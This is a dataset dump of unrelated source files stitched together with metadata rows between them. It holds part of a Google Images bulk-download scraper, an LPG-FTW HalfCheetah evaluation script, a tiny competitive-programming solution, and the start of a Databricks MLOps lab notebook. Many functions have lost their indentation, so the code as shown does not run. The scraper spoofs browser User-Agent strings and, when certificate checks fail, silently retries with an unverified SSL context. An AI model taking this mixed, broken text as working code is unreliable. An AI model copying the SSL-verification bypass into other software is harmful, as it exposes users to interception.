headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers=headers)
try:
response = urllib2.urlopen(req)
except URLError: # Handling SSL certificate failed
context = ssl._create_unverified_context()
response = urlopen(req, context=context)
page = response.read()
return page
except:
return "Page Not found"
# Download Page for more than 100 images
def download_extended_page(url):
"""Render *url* in headless Chrome and return the fully scrolled page source.

Selenium is needed because the static HTML only carries a limited batch
of results; repeatedly paging down (and clicking the element with id
"smb" — presumably the 'show more results' button, TODO confirm) forces
additional results to load. Exits the whole process when chromedriver or
Chrome cannot be located.
"""
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
if sys.version_info[0] < 3:
reload(sys)
sys.setdefaultencoding('utf8')
options = webdriver.ChromeOptions()
options.add_argument('--no-sandbox')
options.add_argument("--headless")
try:
browser = webdriver.Chrome(arguments['chromedriver'], chrome_options=options)
except:
print("Looks like we cannot locate the path the 'chromedriver' (use the '--chromedriver' "
"argument to specify the path to the executable.) or google chrome browser is not "
"installed on your machine")
sys.exit()
browser.set_window_size(1024, 768)
# Open the link
browser.get(url)
time.sleep(1)
print("Getting you a lot of images. This may take a few moments...")
element = browser.find_element_by_tag_name("body")
# Scroll down
for i in range(30):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3)
try:
browser.find_element_by_id("smb").click()
for i in range(50):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
except:
for i in range(10):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
print("Reached end of Page.")
time.sleep(0.5)
source = browser.page_source #page source
#close the browser
browser.close()
return source
#Correcting the escape characters for python2
def replace_with_byte(match):
    """Convert one matched octal escape (e.g. r'\\101') into its character."""
    octal_digits = match.group(0)[1:]
    return chr(int(octal_digits, 8))

def repair(brokenjson):
    """Replace invalid octal escape sequences in *brokenjson* with the
    literal characters they encode, so json.loads can parse the result."""
    # Up to 3 octal digits per escape, covering byte values up to 0xFF.
    return re.sub(r'\\[0-7]{1,3}', replace_with_byte, brokenjson)
# Finding 'Next Image' from the given raw page
def get_next_tab(s):
    """Extract the first related-search tab from raw Google Images HTML.

    Returns a (url, tab_name, end_offset) triple where *end_offset* lets
    the caller slice the page and continue scanning. When no tab anchor
    (class "ZO5Spb") is present, the sentinel ("no_tabs", '', 0) is
    returned instead.
    """
    anchor = s.find('class="ZO5Spb"')
    if anchor == -1:  # If no links are found then give an error!
        return "no_tabs", '', 0
    # The tab link lives in the href="..." attribute after the anchor class.
    href_start = s.find('href="', anchor + 1)
    href_end = s.find('">', href_start + 1)
    url_item = "https://www.google.com" + str(s[href_start + 6:href_end])
    # BUGFIX: the original called url_item.replace('&', '&'), a no-op left
    # over from HTML-entity garbling; decode '&amp;' entities in the href.
    url_item = url_item.replace('&amp;', '&')
    # The human-readable tab name follows the first ':' after the anchor.
    name_start = s.find(':', anchor + 1)
    name_end = s.find('"', name_start + 1)
    url_item_name = str(s[name_start + 1:name_end])
    return url_item, url_item_name, href_end
# Getting all links with the help of '_images_get_next_image'
def get_all_tabs(page):
    """Collect every related-search tab on *page* into a {name: url} dict."""
    tabs = {}
    while True:
        item, item_name, end_content = get_next_tab(page)
        if item == "no_tabs":
            break
        tabs[item_name] = item  # accumulate the discovered tab links
        # Brief pause between parses (pacing kept from the original logic).
        time.sleep(0.1)
        page = page[end_content:]
    return tabs
#Format the object in readable format
def format_object(object):
    """Map Google's terse rg_meta keys onto descriptive dictionary keys."""
    return {
        'image_format': object['ity'],
        'image_height': object['oh'],
        'image_width': object['ow'],
        'image_link': object['ou'],
        'image_description': object['pt'],
        'image_host': object['rh'],
        'image_source': object['ru'],
        'image_thumbnail_url': object['tu'],
    }
#function to download single image
def single_image():
"""Download the single image given by --single_image into main_directory.

The file keeps its basename from the URL (query string stripped); a
'.jpg' extension is appended when the name carries no recognized image
extension. Prints a completion message; returns None.
"""
url = arguments['single_image']
try:
os.makedirs(main_directory)
except OSError as e:
# errno 17 == EEXIST: an already-present directory is fine.
if e.errno != 17:
raise
pass
req = Request(url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req, None, 10)
image_name = str(url[(url.rfind('/')) + 1:])
if '?' in image_name:
image_name = image_name[:image_name.find('?')]
if ".jpg" in image_name or ".gif" in image_name or ".png" in image_name or ".bmp" in image_name or ".svg" in image_name or ".webp" in image_name or ".ico" in image_name:
output_file = open(main_directory + "/" + image_name, 'wb')
else:
output_file = open(main_directory + "/" + image_name + ".jpg", 'wb')
image_name = image_name + ".jpg"
data = response.read()
output_file.write(data)
response.close()
print("completed ====> " + image_name)
return
def similar_images():
    """Resolve the --similar_images image URL into a Google search term.

    Queries Google's search-by-image endpoint with the image URL, scrapes
    the image token from the response, then extracts the query string
    Google associates with the image. Returns that query string, or an
    error-message string when the request fails.
    """
    version = (3, 0)
    cur_version = sys.version_info
    if cur_version >= version:  # Python 3.0 or above
        try:
            searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + arguments['similar_images']
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req1 = urllib.request.Request(searchUrl, headers=headers)
            resp1 = urllib.request.urlopen(req1)
            content = str(resp1.read())
            # Token ('AMhZZ...') identifying the image in Google's index.
            l1 = content.find('AMhZZ')
            l2 = content.find('&', l1)
            urll = content[l1:l2]
            newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
            req2 = urllib.request.Request(newurl, headers=headers)
            resp2 = urllib.request.urlopen(req2)
            # The best-guess query string follows '/search?sa=X&q='.
            l3 = content.find('/search?sa=X&q=')
            l4 = content.find(';', l3 + 19)
            urll2 = content[l3 + 19:l4]
            return urll2
        except:
            # BUGFIX: message previously read "Cloud not connect".
            return "Could not connect to Google Images endpoint"
    else:  # Python 2.x fallback
        try:
            searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + arguments['similar_images']
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req1 = urllib2.Request(searchUrl, headers=headers)
            resp1 = urllib2.urlopen(req1)
            content = str(resp1.read())
            l1 = content.find('AMhZZ')
            l2 = content.find('&', l1)
            urll = content[l1:l2]
            newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
            req2 = urllib2.Request(newurl, headers=headers)
            resp2 = urllib2.urlopen(req2)
            l3 = content.find('/search?sa=X&q=')
            l4 = content.find(';', l3 + 19)
            urll2 = content[l3 + 19:l4]
            return (urll2)
        except:
            return "Could not connect to Google Images endpoint"
#Building URL parameters
def build_url_parameters():
    """Translate CLI filter arguments into the Google Images '&tbs=' fragment.

    Combines the optional language filter (&lr=...), the advanced-search
    parameters (color, color type, usage rights, size, type, time, aspect
    ratio, format) and the optional custom date range into one query
    suffix: '<lang>&tbs=<filters><date-range>'.
    """
    if arguments['language']:
        lang = "&lr="
        lang_param = {"Arabic":"lang_ar","Chinese (Simplified)":"lang_zh-CN","Chinese (Traditional)":"lang_zh-TW","Czech":"lang_cs","Danish":"lang_da","Dutch":"lang_nl","English":"lang_en","Estonian":"lang_et","Finnish":"lang_fi","French":"lang_fr","German":"lang_de","Greek":"lang_el","Hebrew":"lang_iw ","Hungarian":"lang_hu","Icelandic":"lang_is","Italian":"lang_it","Japanese":"lang_ja","Korean":"lang_ko","Latvian":"lang_lv","Lithuanian":"lang_lt","Norwegian":"lang_no","Portuguese":"lang_pt","Polish":"lang_pl","Romanian":"lang_ro","Russian":"lang_ru","Spanish":"lang_es","Swedish":"lang_sv","Turkish":"lang_tr"}
        lang_url = lang + lang_param[arguments['language']]
    else:
        lang_url = ''
    if arguments['time_range']:
        # --time_range is passed as a dict-literal string with single quotes.
        json_acceptable_string = arguments['time_range'].replace("'", "\"")
        d = json.loads(json_acceptable_string)
        # BUGFIX: cd_max previously reused d['time_min'], collapsing every
        # custom date range to a single day.
        time_range = '&cdr:1,cd_min:' + d['time_min'] + ',cd_max:' + d['time_max']
    else:
        time_range = ''
    built_url = "&tbs="
    counter = 0
    # NOTE(review): '>1024*768' maps to 'visz:lt,...' — looks like a typo for
    # 'isz:lt'; confirm against Google's tbs syntax before changing.
    params = {'color':[arguments['color'],{'red':'ic:specific,isc:red', 'orange':'ic:specific,isc:orange', 'yellow':'ic:specific,isc:yellow', 'green':'ic:specific,isc:green', 'teal':'ic:specific,isc:teel', 'blue':'ic:specific,isc:blue', 'purple':'ic:specific,isc:purple', 'pink':'ic:specific,isc:pink', 'white':'ic:specific,isc:white', 'gray':'ic:specific,isc:gray', 'black':'ic:specific,isc:black', 'brown':'ic:specific,isc:brown'}],
              'color_type':[arguments['color_type'],{'full-color':'ic:color', 'black-and-white':'ic:gray','transparent':'ic:trans'}],
              'usage_rights':[arguments['usage_rights'],{'labeled-for-reuse-with-modifications':'sur:fmc','labeled-for-reuse':'sur:fc','labeled-for-noncommercial-reuse-with-modification':'sur:fm','labeled-for-nocommercial-reuse':'sur:f'}],
              'size':[arguments['size'],{'large':'isz:l','medium':'isz:m','icon':'isz:i','>400*300':'isz:lt,islt:qsvga','>640*480':'isz:lt,islt:vga','>800*600':'isz:lt,islt:svga','>1024*768':'visz:lt,islt:xga','>2MP':'isz:lt,islt:2mp','>4MP':'isz:lt,islt:4mp','>6MP':'isz:lt,islt:6mp','>8MP':'isz:lt,islt:8mp','>10MP':'isz:lt,islt:10mp','>12MP':'isz:lt,islt:12mp','>15MP':'isz:lt,islt:15mp','>20MP':'isz:lt,islt:20mp','>40MP':'isz:lt,islt:40mp','>70MP':'isz:lt,islt:70mp'}],
              'type':[arguments['type'],{'face':'itp:face','photo':'itp:photo','clip-art':'itp:clip-art','line-drawing':'itp:lineart','animated':'itp:animated'}],
              'time':[arguments['time'],{'past-24-hours':'qdr:d','past-7-days':'qdr:w'}],
              'aspect_ratio':[arguments['aspect_ratio'],{'tall':'iar:t','square':'iar:s','wide':'iar:w','panoramic':'iar:xw'}],
              'format':[arguments['format'],{'jpg':'ift:jpg','gif':'ift:gif','png':'ift:png','bmp':'ift:bmp','svg':'ift:svg','webp':'webp','ico':'ift:ico'}]}
    for key, value in params.items():
        if value[0] is not None:
            ext_param = value[1][value[0]]
            # counter tells whether this is the first filter appended or not;
            # later filters are comma-separated.
            if counter == 0:
                built_url = built_url + ext_param
                counter += 1
            else:
                built_url = built_url + ',' + ext_param
                counter += 1
    built_url = lang_url + built_url + time_range
    return built_url
#building main search URL
def build_search_url(search_term,params):
"""Assemble the full Google Images search URL for one search term.

Priority: an explicit --url wins; otherwise --similar_images resolves a
reverse-image query via similar_images(); otherwise --specific_site
restricts results to one domain; otherwise a plain keyword search.
*params* is the '&tbs=' filter fragment from build_url_parameters().
"""
# check the args and choose the URL
if arguments['url']:
url = arguments['url']
elif arguments['similar_images']:
keywordem = similar_images()
url = 'https://www.google.com/search?q=' + keywordem + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
elif arguments['specific_site']:
url = 'https://www.google.com/search?q=' + quote(
search_term) + '&as_sitesearch=' + arguments['specific_site'] + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
else:
url = 'https://www.google.com/search?q=' + quote(
search_term) + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
#print(url)
return url
#measures the file size
def file_size(file_path):
    """Return the on-disk size of *file_path* as a human-readable string.

    The byte count is scaled through bytes/KB/MB/GB/TB until it drops
    below 1024; files beyond the last unit yield the raw float instead.
    Paths that are not regular files return None.
    """
    if not os.path.isfile(file_path):
        return None
    size = os.stat(file_path).st_size
    for unit in ('bytes', 'KB', 'MB', 'GB', 'TB'):
        if size < 1024.0:
            return "%3.1f %s" % (size, unit)
        size /= 1024.0
    return size
# make directories
def create_directories(main_directory, dir_name):
"""Create the download folder tree main_directory/dir_name, plus a
parallel '<dir_name> - thumbnail' folder when --thumbnail is set.

EEXIST (errno 17) is tolerated so a concurrently created directory does
not crash the run; any other OSError propagates.
"""
dir_name_thumbnail = dir_name + " - thumbnail"
# make a search keyword directory
try:
if not os.path.exists(main_directory):
os.makedirs(main_directory)
time.sleep(0.2)
path = str(dir_name)
sub_directory = os.path.join(main_directory, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
if arguments['thumbnail']:
sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
if not os.path.exists(sub_directory_thumbnail):
os.makedirs(sub_directory_thumbnail)
else:
# NOTE(review): this branch repeats the sub-directory creation above;
# the two arms differ only in whether main_directory was just created.
path = str(dir_name)
sub_directory = os.path.join(main_directory, path)
if not os.path.exists(sub_directory):
os.makedirs(sub_directory)
if arguments['thumbnail']:
sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
if not os.path.exists(sub_directory_thumbnail):
os.makedirs(sub_directory_thumbnail)
except OSError as e:
if e.errno != 17:
raise
# time.sleep might help here
pass
return
# Download Images
def download_image_thumbnail(image_url,main_directory,dir_name,return_image_name):
"""Download one thumbnail into '<dir_name> - thumbnail', reusing the
file name *return_image_name* chosen by the full-size download.

Returns (download_status, download_message) where status is 'success'
or 'fail'; anticipated network/IO errors are converted into a 'fail'
message instead of propagating.
"""
if arguments['print_urls']:
print("Image URL: " + image_url)
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if arguments['socket_timeout']:
timeout = float(arguments['socket_timeout'])
else:
timeout = 10
response = urlopen(req, None, timeout)
path = main_directory + "/" + dir_name + " - thumbnail" + "/" + return_image_name
output_file = open(path, 'wb')
data = response.read()
output_file.write(data)
response.close()
download_status = 'success'
download_message = "Completed Image Thumbnail ====> " + return_image_name
# image size parameter
if arguments['print_size']:
print("Image Size: " + str(file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return download_status, download_message
# Download Images
def download_image(image_url,image_format,main_directory,dir_name,count):
"""Download one full-size image into main_directory/dir_name.

The saved name is '<prefix><count>. <basename>' where the basename is
taken from the URL (lower-cased, extension normalized from
*image_format*). Returns (download_status, download_message,
return_image_name); status is 'success' or 'fail', and the name is ''
on failure so the thumbnail step can be skipped.
"""
if arguments['print_urls']:
print("Image URL: " + image_url)
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if arguments['socket_timeout']:
timeout = float(arguments['socket_timeout'])
else:
timeout = 10
response = urlopen(req, None, timeout)
# keep everything after the last '/'
image_name = str(image_url[(image_url.rfind('/')) + 1:])
image_name = image_name.lower()
# if no extension then add it
# remove everything after the image name
if image_format == "":
image_name = image_name + "." + "jpg"
elif image_format == "jpeg":
image_name = image_name[:image_name.find(image_format) + 4]
else:
image_name = image_name[:image_name.find(image_format) + 3]
# prefix name in image
if arguments['prefix']:
prefix = arguments['prefix'] + " "
else:
prefix = ''
path = main_directory + "/" + dir_name + "/" + prefix + str(count) + ". " + image_name
output_file = open(path, 'wb')
data = response.read()
output_file.write(data)
response.close()
#return image name back to calling method to use it for thumbnail downloads
return_image_name = prefix + str(count) + ". " + image_name
download_status = 'success'
download_message = "Completed Image ====> " + prefix + str(count) + ". " + image_name
# image size parameter
if arguments['print_size']:
print("Image Size: " + str(file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
return download_status,download_message,return_image_name
# Finding 'Next Image' from the given raw page
def _get_next_item(s):
start_line = s.find('rg_meta notranslate')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('class="rg_meta notranslate">')
start_object = s.find('{', start_line + 1)
end_object = s.find('</div>', start_object + 1)
object_raw = str(s[start_object:end_object])
#remove escape characters based on python version
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: #python3
try:
object_decode = bytes(object_raw, "utf-8").decode("unicode_escape")
final_object = json.loads(object_decode)
except:
final_object = ""
else: #python2
try:
final_object = (json.loads(repair(object_raw)))
except:
final_object = ""
return final_object, end_object
# Getting all links with the help of '_images_get_next_image'
def _get_all_items(page,main_directory,dir_name,limit):
"""Scan *page* for rg_meta items and download up to *limit* images.

For each parsed item: optionally print its metadata, download the image
(and its thumbnail when --thumbnail is set), honor the --delay pacing,
then advance past the consumed HTML. Returns (items, errorCount) where
*items* is the list of formatted metadata dicts that were attempted.
"""
items = []
errorCount = 0
i = 0
count = 1
while count < limit+1:
object, end_content = _get_next_item(page)
if object == "no_links":
break
elif object == "":
# Undecodable metadata blob: skip past it and keep scanning.
page = page[end_content:]
else:
#format the item for readability
object = format_object(object)
if arguments['metadata']:
print("\nImage Metadata" + str(object))
items.append(object) # Append all the links in the list named 'Links'
#download the images
download_status,download_message,return_image_name = download_image(object['image_link'],object['image_format'],main_directory,dir_name,count)
print(download_message)
if download_status == "success":
# download image_thumbnails
if arguments['thumbnail']:
download_status, download_message_thumbnail = download_image_thumbnail(object['image_thumbnail_url'],main_directory,dir_name,return_image_name)
print(download_message_thumbnail)
count += 1
else:
errorCount += 1
#delay param
if arguments['delay']:
time.sleep(int(arguments['delay']))
page = page[end_content:]
i += 1
if count < limit:
print("\n\nUnfortunately all " + str(
limit) + " could not be downloaded because some images were not downloadable. " + str(
count-1) + " is all we got for this search filter!")
return items,errorCount
# Bulk Download
def bulk_download(search_keyword,suffix_keywords,prefix_keywords,limit,main_directory):
"""Run the full download pipeline for every prefix/keyword/suffix combo.

For each combined search term: create its directory, build the search
URL, fetch the page (Selenium when limit > 100), download the images,
optionally dump metadata to logs/<keyword>.txt, and optionally recurse
into related-image tabs. Returns the errorCount of the last combo.

NOTE(review): errorCount is only bound inside the loops; an empty
search_keyword list would raise NameError at the return — confirm
callers always pass at least one keyword.
"""
# appending a dummy value to Suffix Keywords array if it is blank
if len(suffix_keywords) == 0:
suffix_keywords.append('')
if len(prefix_keywords) == 0:
prefix_keywords.append('')
for pky in prefix_keywords:
for sky in suffix_keywords: # 1.for every suffix keywords
i = 0
while i < len(search_keyword): # 2.for every main keyword
iteration = "\n" + "Item no.: " + str(i + 1) + " -->" + " Item name = " + str(pky) + str(search_keyword[i] + str(sky))
print(iteration)
print("Evaluating...")
search_term = pky + search_keyword[i] + sky
dir_name = search_term + ('-' + arguments['color'] if arguments['color'] else '') #sub-directory
create_directories(main_directory,dir_name) #create directories in OS
params = build_url_parameters() #building URL with params
url = build_search_url(search_term,params) #building main search url
if limit < 101:
raw_html = download_page(url) # download page
else:
raw_html = download_extended_page(url)
print("Starting Download...")
items,errorCount = _get_all_items(raw_html,main_directory,dir_name,limit) #get all image items and download images
#dumps into a text file
if arguments['extract_metadata']:
try:
if not os.path.exists("logs"):
os.makedirs("logs")
except OSError as e:
print(e)
text_file = open("logs/"+search_keyword[i]+".txt", "w")
text_file.write(json.dumps(items, indent=4, sort_keys=True))
text_file.close()
#Related images
if arguments['related_images']:
print("\nGetting list of related keywords...this may take a few moments")
tabs = get_all_tabs(raw_html)
for key, value in tabs.items():
final_search_term = (search_term + " - " + key)
print("\nNow Downloading - " + final_search_term)
if limit < 101:
new_raw_html = download_page(value) # download page
else:
new_raw_html = download_extended_page(value)
create_directories(main_directory, final_search_term)
_get_all_items(new_raw_html, main_directory, search_term + " - " + key, limit)
i += 1
return errorCount
#------------- Main Program -------------#
for arguments in records:
#Initialization and Validation of user arguments
if arguments['keywords']:
search_keyword = [str(item) for item in arguments['keywords'].split(',')]
#Initialization and Validation of user arguments
if arguments['keywords_from_file']:
search_keyword = []
file_name = arguments['keywords_from_file']
with codecs.open(file_name, 'r', encoding='utf-8-sig') as f:
if '.csv' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
search_keyword.append(line.replace('\n', '').replace('\r', ''))
# print(line)
#print(search_keyword)
elif '.txt' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
# print line
search_keyword.append(line.replace('\n', '').replace('\r', ''))
#print(search_keyword)
else:
print("Invalid file type: Valid file types are either .txt or .csv \n"
"exiting...")
sys.exit()
# both time and time range should not be allowed in the same query
if arguments['time'] and arguments['time_range']:
parser.error('Either time or time range should be used in a query. Both cannot be used at the same time.')
#Additional words added to keywords
if arguments['suffix_keywords']:
suffix_keywords = [" " + str(sk) for sk in arguments['suffix_keywords'].split(',')]
else:
suffix_keywords = []
# Additional words added to keywords
if arguments['prefix_keywords']:
prefix_keywords = [str(sk) + " " for sk in arguments['prefix_keywords'].split(',')]
else:
prefix_keywords = []
# Setting limit on number of images to be downloaded
if arguments['limit']:
limit = int(arguments['limit'])
else:
limit = 100
if arguments['url']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
if arguments['similar_images']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
# If single_image or url argument not present then keywords is mandatory argument
if arguments['single_image'] is None and arguments['url'] is None and arguments['similar_images'] is None and arguments['keywords'] is None and arguments['keywords_from_file'] is None:
parser.error('Keywords is a required argument!')
# If this argument is present, set the custom output directory
if arguments['output_directory']:
main_directory = arguments['output_directory']
else:
main_directory = "downloads"
# Set the delay parameter if this argument is present
if arguments['delay']:
try:
delay_time = int(arguments['delay'])
except ValueError:
parser.error('Delay parameter should be an integer!')
else:
delay_time = 0
if arguments['print_urls']:
print_url = 'yes'
else:
print_url = 'no'
if arguments['print_size']:
print_size = 'yes'
else:
print_size = 'no'
if arguments['proxy']:
os.environ["http_proxy"] = arguments['proxy']
os.environ["https_proxy"] = arguments['proxy']
#Initialization Complete
if arguments['single_image']: #Download Single Image using a URL
single_image()
else: # or download multiple images based on keywords/keyphrase search
t0 = time.time() # start the timer
errorCount = bulk_download(search_keyword,suffix_keywords,prefix_keywords,limit,main_directory)
print("\nEverything downloaded!")
print("Total Errors: " + str(errorCount) + "\n")
t1 = time.time() # stop the timer
total_time = t1 - t0 # Calculating the total time required to crawl, find and download all the links of 60,000 images
print("Total time taken: " + str(total_time) + " Seconds")
#--------End of the main program --------#
# In[ ]:
| 46.913376 | 618 | 0.609933 |
3fc9b898972a10ccf2545d6d079a01b7b53465d3 | 2,971 | py | Python | experiments/mtl_bodypart_tasks/start/half_cheetah_pgftw.py | optimass/LPG-FTW | fd79b96b67e32735916413e822938188b0bb7948 | [
"Apache-2.0"
] | 8 | 2021-03-21T18:01:28.000Z | 2022-02-20T13:58:16.000Z | experiments/mtl_bodypart_tasks/start/half_cheetah_pgftw.py | optimass/LPG-FTW | fd79b96b67e32735916413e822938188b0bb7948 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:44:40.000Z | 2021-09-22T13:44:40.000Z | experiments/mtl_bodypart_tasks/start/half_cheetah_pgftw.py | optimass/LPG-FTW | fd79b96b67e32735916413e822938188b0bb7948 | [
"Apache-2.0"
] | 2 | 2021-05-18T22:08:44.000Z | 2021-08-16T19:38:11.000Z | '''
Measure performance after updating L at the end
of training each task
'''
from mjrl.utils.gym_env import GymEnv
from mjrl.policies.gaussian_linear_lpg_ftw import LinearPolicyLPGFTW
from mjrl.algos.npg_cg_ftw import NPGFTW
import numpy as np
import gym
import pickle
import torch
import os
SEED = 50 # initial value, 10 will be added for every iteration
job_name_mtl = 'results/halfcheetah_mtl_bodyparts_exp'
job_name_lpgftw = 'results/halfcheetah_lpgftw_bodyparts_exp'
# MTL policy
# ==================================
num_tasks = 20
num_seeds = 5
num_cpu = 5
# Per-task body-part size factors and env ids were produced by the earlier
# MTL experiment run and are reloaded here so every script builds the same tasks.
f = open(job_name_mtl+'/env_factors.pickle', 'rb')
size_factors_list = pickle.load(f)
f.close()
f = open(job_name_mtl+'/env_ids.pickle','rb')
env_ids = pickle.load(f)
f.close()
# Register one modified-HalfCheetah variant per task, keyed by its
# unshuffled task index.
e_unshuffled = {}
for task_id in range(num_tasks):
size_factors = size_factors_list[task_id]
env_id = env_ids[task_id]
gym.envs.register(
id=env_id,
entry_point='gym_extensions.continuous.mujoco.modified_half_cheetah:HalfCheetahModifiedBodyPartSizeEnv',
max_episode_steps=1000,
reward_threshold=3800.0,
kwargs=dict(body_parts=['torso','fthigh','fshin','ffoot'], size_scales=size_factors)
)
e_unshuffled[task_id] = GymEnv(env_id) # only do the environment here, so different files can create the same tasks
# Evaluate each seed: reload the per-seed task order and the policy/baseline
# snapshot saved after training each task, then measure test performance.
for i in range(num_seeds):
np.random.seed(SEED)
torch.manual_seed(SEED)
job_name_lpgftw_seed = job_name_lpgftw + '/seed_{}'.format(i)
# task_order.pickle gives this seed's task ordering (presumably fixed
# during training — confirm against the training script).
f = open(job_name_lpgftw_seed+'/task_order.pickle', 'rb')
task_order = pickle.load(f)
f.close()
e = {}
for task_id in range(num_tasks):
e[task_id] = e_unshuffled[task_order[task_id]]
baseline_mtl = {}
forward_transfer_results = {}
for t in range(num_tasks):
job_name_lpgftw_seed = job_name_lpgftw + '/seed_{}'.format(i)
f = open(job_name_lpgftw_seed + '/iterations/task_{}/'.format(t) + 'policy_0.pickle', 'rb')
policy_mtl = pickle.load(f)
f.close()
f = open(job_name_lpgftw_seed + '/iterations/task_{}/'.format(t) + 'baseline_0.pickle', 'rb')
baseline_mtl[t] = pickle.load(f)
f.close()
# An empty-list theta is replaced by an empty tensor before use.
if isinstance(policy_mtl.model.theta, list):
policy_mtl.model.theta = torch.autograd.Variable(torch.zeros(0))
agent_mtl = NPGFTW(e, policy_mtl, baseline_mtl, normalized_step_size=0.1, seed=SEED, save_logs=False, new_col_mode='performance')
mean_test_perf = agent_mtl.test_tasks(test_rollouts=10,
num_cpu=num_cpu,
task_ids=np.array([t]))
forward_transfer_results = {**forward_transfer_results, **mean_test_perf}
result_file = open(job_name_lpgftw_seed + '/start_results.txt', 'w')
result_file.write(str(forward_transfer_results))
result_file.close()
SEED += 10
| 33.382022 | 141 | 0.653989 |
27857da825a18fa2797511cd7c3220edb153aa8c | 41 | py | Python | problem/01000~09999/03046/3046.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-19T16:37:44.000Z | 2019-04-19T16:37:44.000Z | problem/01000~09999/03046/3046.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-20T11:42:44.000Z | 2019-04-20T11:42:44.000Z | problem/01000~09999/03046/3046.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 3 | 2019-04-19T16:37:47.000Z | 2021-10-25T00:45:00.000Z | a,b=map(int,input().split())
print(2*b-a) | 20.5 | 28 | 0.634146 |
d7d6fe6af5689b98a626240d46c9e88f878d1bca | 15,056 | py | Python | project3-mlops/Labs/05-Lab.py | Shemkent/dscc202-402-spring2022 | 446c0709f2c298169223abfb5c8e7f4374d53484 | [
"MIT"
] | null | null | null | project3-mlops/Labs/05-Lab.py | Shemkent/dscc202-402-spring2022 | 446c0709f2c298169223abfb5c8e7f4374d53484 | [
"MIT"
] | null | null | null | project3-mlops/Labs/05-Lab.py | Shemkent/dscc202-402-spring2022 | 446c0709f2c298169223abfb5c8e7f4374d53484 | [
"MIT"
] | null | null | null | # Databricks notebook source
# MAGIC %md
# MAGIC # Lab: Adding Pre and Post-Processing Logic
# MAGIC
# MAGIC ##  In this lab you:<br>
# MAGIC - Import data and train a random forest model
# MAGIC - Defining pre-processing steps
# MAGIC - Adding post-processing steps
# MAGIC
# MAGIC ## Prerequisites
# MAGIC - Web browser: Chrome
# MAGIC - A cluster configured with **8 cores** and **DBR 7.0 ML**
# COMMAND ----------
# MAGIC %md
# MAGIC ##  Classroom-Setup
# MAGIC
# MAGIC For each lesson to execute correctly, please make sure to run the **`Classroom-Setup`** cell at the<br/>
# MAGIC start of each lesson (see the next cell) and the **`Classroom-Cleanup`** cell at the end of each lesson.
# COMMAND ----------
